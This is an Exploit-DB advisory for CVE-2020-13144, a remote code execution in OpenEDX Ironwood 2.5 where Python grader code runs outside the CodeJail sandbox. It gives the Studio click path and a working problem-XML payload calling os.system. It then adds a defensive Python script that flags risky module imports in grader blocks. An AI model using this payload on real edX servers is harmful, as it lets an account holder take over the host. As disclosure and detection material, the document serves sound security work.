OpenEDX platform Ironwood 2.5 – Remote Code Execution

  • Author: Daniel Monzón
    Date: 2020-05-21
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/48500/
  • # Exploit Title: OpenEDX platform Ironwood 2.5 - Remote Code Execution
    # Google Dork: N/A
    # Date: 2020-05-20
    # Exploit Author: Daniel Monzón (stark0de)
    # Vendor Homepage: https://open.edx.org/
    # Software Link: https://github.com/edx/edx-platform
    # Version: Ironwood 2.5
    # Tested on: Debian x64
    # CVE : CVE-2020-13144
    
    CVE ID: CVE-2020-13144
    
    OpenEDX Platform Ironwood version 2.5 suffers from an RCE vulnerability when the use of CodeJail (https://github.com/edx/codejail) is not enforced: Python grader code embedded in a problem is then evaluated outside the sandbox.
    
    This is an authenticated vulnerability, so you need to register an account and then go to /edx-studio.
    
    Then Create New course > New section > New subsection > New unit > Add new component > Problem button > Advanced tab > Custom Python evaluated code
    
    Once here we just need to edit the problem and introduce a payload such as:
    
    <problem>
    
    <script type="python">
    def test_add(expect, ans):
        import os
        os.system("thecommandyouwanttoexecute")
    </script>
    
    <p>Problem text</p>
    <customresponse cfn="test_add" expect="20">
    <textline size="10" correct_answer="11" label="Integer #1"/><br/>
    <textline size="10" correct_answer="9" label="Integer #2"/>
    </customresponse>
    
    <solution>
    <div class="detailed-solution">
    <p>Solution or Explanation Heading</p>
    <p>Solution or explanation text</p>
    </div>
    </solution>
    </problem>
    
    Then click Submit: the command is executed on the server hosting the platform.
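    As an added defensive example (not part of the original advisory or of the edX code base), the following audit parses a problem's XML, finds `<script type="python">` grader blocks like the one above and reports any import of a module that should never appear in course content when CodeJail is not enforced. The watch-list and the sample problem are constructed for this example.

```python
import ast
import xml.etree.ElementTree as ET

# Constructed watch-list of modules whose import inside a Python grader block
# warrants review (this is not an edX setting, just a reasonable default).
RISKY_MODULES = {"os", "subprocess", "sys", "socket", "shutil", "ctypes", "importlib"}

# Constructed sample: a custom-response problem whose grader shells out,
# mirroring the shape of the payload in the advisory.
SAMPLE_PROBLEM = """<problem>
<script type="python">
def test_add(expect, ans):
    import os
    os.system("echo constructed-sample")
</script>
<p>Problem text</p>
<customresponse cfn="test_add" expect="20">
<textline size="10" correct_answer="11" label="Integer #1"/><br/>
</customresponse>
</problem>"""


def _imported_modules(tree):
    """Collect top-level module names from every import in the AST,
    including imports nested inside function bodies."""
    found = set()
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            found.update(alias.name.split(".")[0] for alias in node.names)
        elif isinstance(node, ast.ImportFrom) and node.module:
            found.add(node.module.split(".")[0])
    return found


def audit_problem_xml(xml_text):
    """Return findings for each Python grader script in a problem XML.

    A finding is a dict with the script index, the risky modules it imports,
    and a parse_error flag; scripts that are not valid Python are reported too,
    since they would fail in the grader and still deserve a look."""
    root = ET.fromstring(xml_text)
    findings = []
    for i, script in enumerate(root.iter("script")):
        if script.get("type") != "python":
            continue
        try:
            tree = ast.parse(script.text or "")
        except SyntaxError:
            findings.append({"script": i, "modules": None, "parse_error": True})
            continue
        risky = sorted(_imported_modules(tree) & RISKY_MODULES)
        if risky:
            findings.append({"script": i, "modules": risky, "parse_error": False})
    return findings
```

    Running it over an exported course (one call per problem file) gives a quick inventory of grader blocks to review; the actual fix remains enforcing CodeJail so that grader code is sandboxed regardless of what it imports.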